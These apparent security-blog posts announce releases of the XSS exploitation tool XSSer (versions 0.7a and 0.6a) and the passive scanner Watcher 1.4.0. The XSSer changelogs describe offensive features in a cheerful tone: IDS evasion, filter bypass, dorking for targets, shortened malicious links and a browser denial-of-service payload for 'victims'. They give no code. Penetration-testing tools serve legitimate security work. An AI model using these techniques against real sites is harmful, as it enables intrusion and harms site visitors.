All of you web application penetration testers, check out this release of XSSer version 0.7a, for it now has 26 new injections!
“XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.“
These are the changes:
- Added attack payloads to fuzzer (26 new injections).
- Added POST connections: Now you can inject on webforms.
- Added Statistics: reports with data about efficiency, connections, vectors, etc..
- Added URL Shorteners: Now, it is possible to have valid results in short links. for the moment support tinyurl and is.gd. your “malicious” code ready to share!!
- Added IP Octal: Spoofing for fuzzing vectors. Your remote/local IPs encoded in Octal.
- Added Post-processing payloads: When you see have a valid “hole/payload”, you can say to XSSer to prepare the real code that you want to inject.
- Added DOM Shadows: For this version, this implementation is a server side anti-logging feature. You can inject code using Document Object Model eval function, to evade some possible server IDS’s.
- Added Cookie injector: Now is possible to inject code on HTTP Cookie parameters automatically.
- Added Browser DoS (Denial of Service): Yes!!. If you have a valid payload to inject, XSSer will prepare you a code for share with victims who “collapse” their browsers. DoS of client browser ready for play friend -scripter-!
You can download XSSer version 0.7a here.
Searches leading to this post:
xsser tutorial
Tagged as: cross-site scripting, FireFox, HTTPS, Open Source, Web Application Penetration Testing, Web Application Scanner, xss attack, XSSer, XSSploit
All of you web application penetration testers, check out this release of XSSer version 0.6a, for it now has THREE new features! They are:
1. DORK: Process search engine dork results as target URLs. You can also specify the search engines that you would like to use – Scroogle, Altavista, Bing, etc.
2. CRAWLING: Crawl target hierarchy parameters. You can specify the depth.
3. Encode: Encodes fuzzing IP addresses in DWORD format.
“XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.“
So as you can see, this version adds dorking and crawling support with IP DWORD encoding. Also, the core code has been cleaned a bit.
You can download XSSer version 0.6a here.
Tagged as: cross-site scripting, FireFox, HTTPS, Open Source, Web Application Penetration Testing, Web Application Scanner, xss attack, XSSer, XSSploit
You can find our original post about Watcher here. Now, Casaba Security, the company responsible for this open source project has released an updated version – Watcher version 1.4.0!
“Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won’t damage production systems, it’s completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.“
This is the change log for the update:
- Check descriptions all improved and updated with recommendations and external references.
- New check for JavaScript document.domain lowering.
- IMPORTANT: All cookie checks now perform noise filtering by default, with no option to change.
- New installations now come with a few noisy checks disabled by default.
- New installations now come with some check configurations enabled by default to reduce noise.
- Fixed bug in loosely scoped domain where it wasn’t defaulting to origin when one’s not specified.
- Fixed bug where check configurations weren’t saving.
- Assorted bug fixes.
Download Watcher version 1.4.0 here.
Tagged as: Microsoft SDL, Open Source, Watcher, Web Application Penetration Testing, xss attack
